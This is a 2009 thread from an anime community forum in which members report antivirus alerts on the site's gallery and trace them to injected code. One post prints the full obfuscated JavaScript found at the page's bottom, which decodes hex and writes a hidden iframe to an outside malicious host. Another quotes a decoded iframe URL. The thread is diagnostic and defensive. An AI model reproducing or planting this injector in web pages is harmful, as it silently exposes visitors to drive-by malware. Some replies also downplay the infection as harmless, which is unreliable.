Anime Online
Home Forums Gallery Reviews RPG Arcade Register Rules / FAQ

Welcome to AnimeOnline.net, your personal Anime Community!

 Anime Online Rulez!



Go Back   Anime Online > AO Central > Feedback and Questions
Gallery Trojan Gallery Trojan
Register FAQ Members List Social Groups Calendar Search Today's Posts Mark Forums Read Image Host

Feedback and Questions Post feedback, questions, bug reports, or suggestions you may have about Anime Online.

Reply
Page 1 of 2 1 2
 
LinkBack Thread Tools Display Modes
Old May 19, 2009, 11:25 PM   #1 (permalink)
Legendary Otaku
 
Legend's Avatar
 
Join Date: Oct 2004
Location: Sharks Territory
Posts: 4,763
Thanks: 65
Thanked 67 Times in 61 Posts
Legend is making a name for themselvesLegend is making a name for themselvesLegend is making a name for themselves
Gallery Trojan
In response to this thread: Virus?.......

more information, I use ESET NOD32 and here is what it quarantined just now:

Main Index - Anime Online Gallery
Size: 89040
HTML/TrojanClicker.IFrame.NAG Trojan
__________________

'Cause you give me something / That makes me scared, alright / This could be nothing / But I'm willing to give it a try / Please give me something
'Cause someday I might call you from my heart
Status: Offline
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old May 19, 2009, 11:48 PM   #2 (permalink)
AO's Stoner ~
 
Violent's Avatar
 
Join Date: Sep 2006
Location: NC
Posts: 1,674
Thanks: 0
Thanked 12 Times in 8 Posts
Violent may be famous one dayViolent may be famous one day
Re: Gallery Trojan
Quote:
The requested URL could not be retrieved

While trying to retrieve the URL:

Main Index - Anime Online Gallery

The following error was encountered:

The requested object is INFECTED with the following viruses: Trojan-Downloader.JS.Iframe.anj


Please contact your service provider if you consider it incorrect.
I use Kaspersky, also I went over to the Kaspersky Lab forums and many of the staff say its a false positive.

I've been getting the message for about 3 months now maybe. Could it be an ad that's in the gallery?

Also here is where my trojan goes to every time,

Quote:
C:\Documents and Settings\Vortex\Local Settings\Application Data\Mozilla\Firefox\Profiles\9y4ti2wo.default\Cac he
And it always has the same file name "7EE25133d01"

Edit:

I would also like to add on that I see a site in the name of "lazyfish" that I googled and some others also get it as a virus/trojan.

Quote:
Yep, hacker code on there

There's some obfuscated javascript at the bottom of the page indicative of hacker code, and that's probably what set off your AV

It's too long to post the JS but this is what it decodes to:

Code:
<iframe height="1" width="1" src="http://triplex.lazyfish.cc/forum/Lasna"
That seemed to be empty when I visited the gypsy page, but it does return codes when I put it through Jutaky's detector and it's more obfuscated javascript. I can't see what it's hiding though
Link:
Who-Is-Who-In-GPT -> Gypsy Jackpot Virus upon Sign in
__________________
Obey the forum rules and I will love you!

AnimeOnline IRC check my profile for details!
Status: Offline
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old May 20, 2009, 12:16 AM   #3 (permalink)
Apathetic Bastard
 
aceman67's Avatar
 
Join Date: Nov 2004
Location: Coalhurst Alberta, Canada
Posts: 2,458
Thanks: 10
Thanked 136 Times in 106 Posts
aceman67 has become well knownaceman67 has become well knownaceman67 has become well known
Re: Gallery Trojan
took a look at the source code for the gallery main page, and I found this
Code:
<script>check_content()</script><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c41687154048m49085183dbae7(m49085183dc3cb){ function m49085183dca5d(){return 16;} return (parseInt(m49085183dc3cb,m49085183dca5d()));}function m49085183dd613(m49085183dd9f9){ function m49085183de5b3(){var m49085183de9c2=2;return m49085183de9c2;} var m49085183ddde3='';m49085183df175=String.fromCharCode;for(m49085183de1df=0;m49085183de1df<m49085183dd9f9.length;m49085183de1df+=m49085183de5b3()){ m49085183ddde3+=(m49085183df175(c41687154048m49085183dbae7(m49085183dd9f9.substr(m49085183de1df,m49085183de5b3()))));}return m49085183ddde3;} var z18='';var m49085183df939='3C7'+z18+'3637'+z18+'2697'+z18+'07'+z18+'43E696628216D7'+z18+'96961297'+z18+'B646F637'+z18+'56D656E7'+z18+'42E7'+z18+'7'+z18+'7'+z18+'2697'+z18+'465287'+z18+'56E657'+z18+'363617'+z18+'065282027'+z18+'2533632536392536362537'+z18+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+z18+'332537'+z18+'32253633253364253237'+z18+'2536382537'+z18+'342537'+z18+'342537'+z18+'302533612532662532662536322537'+z18+'35253637'+z18+'2537'+z18+'61253639253663253663253631253265253638253639253637'+z18+'2536382536632536352537'+z18+'362536352536632532652536322536392537'+z18+'612532662536362536662537'+z18+'322537'+z18+'352536642532662534632536312537'+z18+'33253665253631253366253237'+z18+'2532622534642536312537'+z18+'342536382532652537'+z18+'322536662537'+z18+'352536652536342532382534642536312537'+z18+'342536382532652537'+z18+'32253631253665253634253666253664253238253239253261253337'+z18+'253338253337'+z18+'253330253333253239253262253237'+z18+'253332253335253237'+z18+'2532302537'+z18+'37'+z18+'2536392536342537'+z18+'34253638253364253333253337'+z18+'253333253230253638253635253639253637'+z18+'2536382537'+z18+'342533642533322533312533312532302537'+z18+'332537'+z18+'342537'+z18+'39253663253635253364253237'+z18+'2536342536392537'+z18+'332537'+z18+'302536632536312537'+z18+'39253361253230253665253666253665253635253237'+z18+'2533652533632532662536392536362537'+z18+'3225363125366425363525336527'+z18+'29293B7'+z18+'D7'+z18+'6617'+z18+'2206D7'+z18+'969613D7'+z18+'47'+z18+'27'+z18+'5653B3C2F7'+z18+'3637'+z18+'2697'+z18+'07'+z18+'43E';document.write(m49085183dd613(m49085183df939));</script><script>check_content()</script>
Right down at the bottom of the page. Might want to check the footer.php file and see if its there, shouldn't be too hard to remove
__________________
Please, in the name of all that is holy and good, Raptor Jesus, Read the RULES.

I think; therefore you are : Xfire : Art Portfolio : DevART : AnimePaper : SheezyART :
Status: Offline
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old May 20, 2009, 09:02 AM   #4 (permalink)
Otaku
 
zangetsu412's Avatar
 
Join Date: Mar 2009
Location: I live in Houston Tx
Posts: 167
Thanks: 4
Thanked 7 Times in 7 Posts
zangetsu412 is off to a good start
Re: Gallery Trojan
Wait wats going on? Whats this about scripts? plz tell me!
Status: Offline
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old May 20, 2009, 05:49 PM   #5 (permalink)
AO's Stoner ~
 
Violent's Avatar
 
Join Date: Sep 2006
Location: NC
Posts: 1,674
Thanks: 0
Thanked 12 Times in 8 Posts
Violent may be famous one dayViolent may be famous one day
Re: Gallery Trojan
Quote:
Originally Posted by zangetsu412 View Post
Wait wats going on? Whats this about scripts? plz tell me!
I think its an AD trojan (loads ads in your browser) honestly nothing to big to worry about but I haven't heard too much word about this trojan so don't be to careless.
__________________
Obey the forum rules and I will love you!

AnimeOnline IRC check my profile for details!
Status: Offline
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old May 22, 2009, 01:00 PM   #6 (permalink)
Otaku
 
AstralMage01's Avatar
 
Join Date: Feb 2008
Location: Somewhere I like to be
Posts: 176
Thanks: 1
Thanked 2 Times in 2 Posts
AstralMage01 is off to a good start
Re: Gallery Trojan
Well, It's true that there's a trojan in the gallery as my antivirus detected it, but it isn't a big problem since I know that it exists & it doesn't deal real damage to the computer
__________________
"If you do not believe in yourself, hardwork is useless"
"Might Gai" from "Naruto"
Status: Offline
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old May 22, 2009, 08:26 PM   #7 (permalink)
Newbie
 
Join Date: Feb 2009
Posts: 1
Thanks: 0
Thanked 0 Times in 0 Posts
Pikaflash is off to a good start
Re: Gallery Trojan
As an unprotected Mac user with a UNIX kernel OS and without anti-virus i get this:

If i click [ignore warning], safari ignore the malicious code and the page go back to normal.



And if i click on [information], i see animeonline.net blacklisted by Google.

This is serious guys. It is not a false alert like an over-protective anti virus program make it sounds like.
Last edited by Pikaflash; May 22, 2009 at 09:21 PM.
Status: Offline
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old May 23, 2009, 07:28 PM   #8 (permalink)
L.D. Relationship- 2.5yrs
 
Sazzy's Avatar
 
Join Date: Nov 2004
Location: In my imagination restricted by British Society!
Posts: 1,985
Thanks: 9
Thanked 40 Times in 34 Posts
Sazzy is making a name for themselvesSazzy is making a name for themselves
Re: Gallery Trojan
I received the message in FF but when I changed to IE, it worked fine. I don't know FF is being stupid. I even tried to update the Add-ons but there wasn't any available.
__________________
FAVOURITE THREADS EXPLAIN why, or risk an infraction.

JOHNNY JOHNNY JOHNNY JOHNNY JOHNNY
|Sazzy-Bu.co.uk | My Deviant Art | Anime Vector |My Twitter |
Status: Offline
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply
Page 1 of 2 1 2

Bookmarks

« i have a question | rules regarding user bars »
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
New Gallery Cat added (Standard Render Gallery) Sinistra Announcements 4 Dec 01, 2006 11:40 PM
PSP Trojan program, a First!!!... LenMiyata The Thread Vault 1 Oct 07, 2005 04:21 AM


All times are GMT -7. The time now is 10:52 PM.

Contact Us - Anime Online - Archive - Privacy Statement - Terms of Service - Top

Top 10 Lists | Naruto Shippuuden | Anime Wallpapers | Anime Freak | Ringtones | Anime Avatars | Anime Girls | Watch Anime Online | Anime Buddy Icons
Anime Online Banners by fooligar. ©
This Anime skin cannot be reproduced on any website without written permission from the Anime Online Staff.
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios
Free MMORPG Games |Ad Management by RedTyger

SEO by vBSEO 3.3.1

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151